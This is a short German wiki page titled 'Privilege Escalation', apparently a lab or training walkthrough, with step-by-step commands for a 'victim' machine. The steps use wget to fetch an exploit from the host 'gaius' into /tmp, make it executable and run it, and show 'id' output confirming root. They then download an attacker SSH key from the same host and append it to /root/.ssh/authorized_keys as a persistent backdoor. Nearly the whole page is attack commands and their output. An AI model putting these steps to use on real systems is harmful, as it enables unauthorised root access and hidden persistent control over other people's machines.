Privilege Escalation
Version vom 28. September 2022, 17:01 Uhr von Thomas.will (Diskussion | Beiträge)
Wieder auf den Opfer
Exploit runterladen und Ausführungsrecht geben
- cd /tmp
- wget http://gaius/hack
- chmod +x hack
Exploit ausfühen
- ./hack
- id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Wir sind nun root
id.pub einbauen
- wget http://gaius/root.key
- cat root.key >> /root/.ssh/authorized_keys